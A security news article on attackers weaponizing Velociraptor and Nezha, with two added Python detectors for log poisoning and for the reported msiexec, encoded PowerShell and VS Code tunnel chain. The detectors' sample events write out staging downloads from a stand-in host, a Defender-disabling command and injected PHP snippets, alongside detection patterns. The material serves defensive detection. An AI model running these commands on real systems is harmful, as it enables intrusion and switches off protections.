Legit Tools Turned Malicious: Velociraptor and Nezha Weaponized

Summary
– Threat actors are increasingly using commercial and open-source tools like Velociraptor and Nezha in their attacks.
– A suspected China-based ransomware group used Velociraptor to maintain persistent access and deploy multiple ransomware types on VMware ESXi and Windows servers.
– The attackers exploited a privilege escalation vulnerability in an outdated Velociraptor version and used Cloudflare Workers domains to host and deploy their tools.
– Another suspected China-nexus APT group used Nezha, a server monitoring tool, to gather system information and deploy Ghost RAT via log poisoning and a web shell.
– These tools give attackers lower detection rates and plausible deniability compared to custom malware; the scale of the Nezha campaign, found on over 100 victim machines, shows how effective the approach is.
Cybersecurity professionals are witnessing a troubling trend where legitimate software tools are being repurposed for malicious campaigns. Security researchers have identified two open-source platforms, Velociraptor and Nezha, being actively weaponized by threat actors to establish persistence, evade detection, and deploy damaging payloads across enterprise networks.
A ransomware group with suspected ties to China has incorporated Velociraptor into its attack chain. This tool, normally employed for digital forensics and incident response, helps maintain hidden access to compromised systems. The attackers leveraged an outdated Velociraptor version (0.73.4.0) containing a privilege escalation flaw tracked as CVE-2025-6264, which could result in complete endpoint takeover and arbitrary command execution. Their objective involved deploying Warlock, LockBit, and Babuk ransomware strains on both VMware ESXi virtual machines and Windows servers.
According to Cisco Talos, the intrusion followed a specific sequence. The threat actor used the Windows msiexec utility to fetch an installer from a Cloudflare Workers domain, which served as a staging area for various tools. This installer deployed Velociraptor, configured to communicate with a command-and-control server. The attackers then executed an encoded PowerShell command to download Visual Studio Code from the same location, running it with tunneling enabled and installing it as a service. A subsequent msiexec command downloaded additional malware, illustrating a multi-stage intrusion process. Sophos incident responders identified matching indicators of compromise and successfully blocked the ransomware deployment.
In a separate campaign, a suspected China-nexus APT group has been using Nezha, an open-source server monitoring and task management application. This tool allows the group to gather detailed system information and remotely control compromised machines, serving as an alternative to more common remote administration tools.
Huntress researchers documented an intrusion beginning in August 2025 where attackers used a technique called log poisoning to implant a China Chopper web shell on a web server. This provided initial access, which they leveraged to deploy Nezha for executing commands directly on the server. Notably, the attackers then used Nezha to install Ghost RAT malware, marking the first publicly reported case of Nezha facilitating web server compromises.
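Log poisoning, in general terms, means getting attacker-controlled text written into a file (such as a web server access log) that the application later includes or executes; the article does not spell out the mechanics of this intrusion. The following checker is an added example, not code from Huntress or from the article, and scans constructed access-log lines in the common "combined" format for script fragments carried in the request line, referer or User-Agent, checking both the raw and the URL-decoded field so percent-encoded payloads are not missed. The log lines, hostnames and fragment list are this example's own assumptions.

```python
import re
from urllib.parse import unquote

# One "combined" log format record: client, identity, user, [timestamp],
# "request line", status, bytes, "referer", "user-agent".
LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Fragments that have no business in a client-supplied HTTP field. This list
# is an assumption for the example, not a complete signature set.
CODE_FRAGMENT = re.compile(
    r"<\?php|<\?=|<%|\beval\s*\(|\bsystem\s*\(|\bbase64_decode\s*\(", re.I
)


def find_fragment(value):
    """Return the first script fragment in `value`, raw or URL-decoded, or None."""
    for candidate in (value, unquote(value)):
        m = CODE_FRAGMENT.search(candidate)
        if m:
            return m.group(0)
    return None


def scan_line(line):
    """Return a finding dict if any client-controlled field carries code, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None  # unparseable line: a real pipeline would count these
    for field in ("request", "referer", "ua"):
        frag = find_fragment(m.group(field))
        if frag:
            return {"ip": m.group("ip"), "ts": m.group("ts"),
                    "field": field, "fragment": frag}
    return None


def scan(lines):
    """Run scan_line over an iterable of log lines and collect the hits."""
    return [hit for hit in map(scan_line, lines) if hit]


# Constructed sample log lines; the addresses, paths and timestamps are made up.
SAMPLE_LOG = [
    '10.0.0.20 - - [12/Aug/2025:03:13:55 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [12/Aug/2025:03:14:07 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "<?php echo \'poisoned\'; ?>"',
    '10.0.0.5 - - [12/Aug/2025:03:14:09 +0000] "GET /page.php?lang=%3C%3Fphp%20echo%201%3B%20%3F%3E HTTP/1.1" 200 512 "-" "curl/8.0"',
    '10.0.0.21 - - [12/Aug/2025:03:15:00 +0000] "GET /about.html HTTP/1.1" 200 1024 "https://example.test/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['ts']} field={hit['field']} fragment={hit['fragment']!r}")
```

Run against the real access log of the web server, a hit on the User-Agent or query-string field is a reason to look for a follow-on local-file-include request and for newly written files in the web root, which is where a dropped web shell would show up.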
The researchers located the attacker’s Nezha server instance, discovering an exposed dashboard interface. While administrative credentials are typically required for full control, the interface publicly displayed system health information for all connected agents. Through this exposure, Huntress confirmed that the Nezha client had been installed on over 100 victim machines. The threat actor’s dashboard was configured in Russian, adding another layer to their operational security.
Attackers utilized the Nezha agent to run interactive PowerShell scripts that disabled Windows Defender protections before deploying the Ghost RAT variant. This approach demonstrates how threat actors continuously adapt, incorporating newly available public tools into their arsenals. These legitimate tools offer significant advantages: they’re less likely to trigger security alerts, and if discovered, provide attackers with plausible deniability since the software itself has legitimate purposes.
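Both campaigns leave ordinary process-creation telemetry behind: the Velociraptor intrusion chain described above (msiexec pulling an installer from a remote URL, an encoded PowerShell command, VS Code installed as a tunnelling service, a further msiexec download) and the Nezha-driven PowerShell that disables Defender before the RAT drop. The detector below is an added example, not code from Talos, Sophos or Huntress, that tags constructed process events with those behaviours and raises a high-severity finding when the whole reported sequence lands on one host within a time window or when Defender is tampered with. Tag names, regexes, the two-hour window and every hostname, URL and path in the sample events are this example's own assumptions.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Behaviour patterns taken from the two intrusions described above. The
# regexes, tag names and window are this example's own choices, not a vendor
# signature.
REMOTE_URL = re.compile(r"https?://\S+", re.I)
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
DEFENDER_TAMPER = re.compile(r"Set-MpPreference\s+-Disable\w+|Add-MpPreference\s+-Exclusion\w+", re.I)
DOWNLOAD_CRADLE = re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|Start-BitsTransfer", re.I)
VSCODE_TUNNEL = re.compile(r"\bcode(?:\.exe)?\b[^|;]*\btunnel\b", re.I)

# The sequence Talos reported for the Velociraptor intrusion, expressed as tags.
CHAIN = ("msiexec_remote_install", "powershell_encoded", "vscode_tunnel")


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Map one process-creation event to the behaviour tags it exhibits."""
    tags = []
    image = event["image"].lower()
    cmd = event["cmdline"]
    if image.endswith("msiexec.exe") and REMOTE_URL.search(cmd):
        tags.append("msiexec_remote_install")
    if image.endswith(("powershell.exe", "pwsh.exe")):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            tags.append("powershell_encoded")
            cmd = decoded  # inspect the real script, not the base64 wrapper
        if DEFENDER_TAMPER.search(cmd):
            tags.append("defender_tamper")
        if DOWNLOAD_CRADLE.search(cmd):
            tags.append("download_cradle")
    if VSCODE_TUNNEL.search(cmd):
        tags.append("vscode_tunnel")
    return tags


def analyze(events, window=timedelta(hours=2)):
    """Tag every event; add a high-severity finding per host where the whole
    CHAIN is first seen inside `window`. Defender tampering is high on its own."""
    findings = []
    first_seen = defaultdict(dict)  # host -> tag -> earliest timestamp
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        for tag in classify(ev):
            first_seen[ev["host"]].setdefault(tag, t)
            sev = "high" if tag == "defender_tamper" else "medium"
            findings.append({"host": ev["host"], "time": ev["time"], "tag": tag, "severity": sev})
    for host, seen in first_seen.items():
        if all(tag in seen for tag in CHAIN):
            times = [seen[tag] for tag in CHAIN]
            if max(times) - min(times) <= window:
                findings.append({"host": host, "time": min(times).isoformat(),
                                 "tag": "velociraptor_style_chain", "severity": "high"})
    return findings


def _enc(script):
    """Build a -EncodedCommand argument the way PowerShell expects it (sample-building helper)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation events; hosts, URLs and paths are made up.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSI = r"C:\Windows\System32\msiexec.exe"
SAMPLE_EVENTS = [
    {"host": "srv-01", "time": "2025-08-01T10:00:00", "image": MSI,
     "cmdline": "msiexec.exe /q /i https://stage.example.workers.dev/agent.msi"},
    {"host": "srv-01", "time": "2025-08-01T10:05:00", "image": PS,
     "cmdline": "powershell.exe -NoP -W Hidden -enc " + _enc(
         r"Invoke-WebRequest https://stage.example.workers.dev/code.zip -OutFile C:\ProgramData\code.zip; "
         r"C:\ProgramData\code.exe tunnel service install")},
    {"host": "srv-01", "time": "2025-08-01T10:20:00", "image": MSI,
     "cmdline": "msiexec.exe /q /i https://stage.example.workers.dev/next.msi"},
    {"host": "ws-07", "time": "2025-08-02T09:00:00", "image": PS,
     "cmdline": "powershell.exe -enc " + _enc("Set-MpPreference -DisableRealtimeMonitoring $true")},
    {"host": "admin-01", "time": "2025-08-02T12:00:00", "image": MSI,
     "cmdline": r"msiexec.exe /i C:\Installers\inventory.msi /qn"},  # local package: benign
    {"host": "admin-01", "time": "2025-08-02T12:30:00", "image": PS,
     "cmdline": "powershell.exe -Command Get-Service"},  # plain command: benign
]


def tags_by_host(events):
    """Convenience view: host -> sorted list of tags raised by analyze()."""
    out = defaultdict(set)
    for f in analyze(events):
        out[f["host"]].add(f["tag"])
    return {h: sorted(t) for h, t in out.items()}


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['severity']:<6} {f['host']:<9} {f['time']}  {f['tag']}")
```

The individual tags are noisy on their own (administrators do install MSI packages from URLs and do run encoded commands), which is why the example scores the full sequence on one host rather than any single event; the Defender-tampering tag is the exception, since a script that turns real-time monitoring off is worth a look regardless of what ran before it.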
The two cases of Velociraptor and Nezha highlight a broader shift in attacker tradecraft. As defenders improve at detecting traditional malware, attackers increasingly turn to dual-use tools that blend into normal network traffic. Security teams must now account for these applications in their threat models, recognizing that the very tools used for system administration and monitoring can be turned against them.
(Source: HelpNet Security)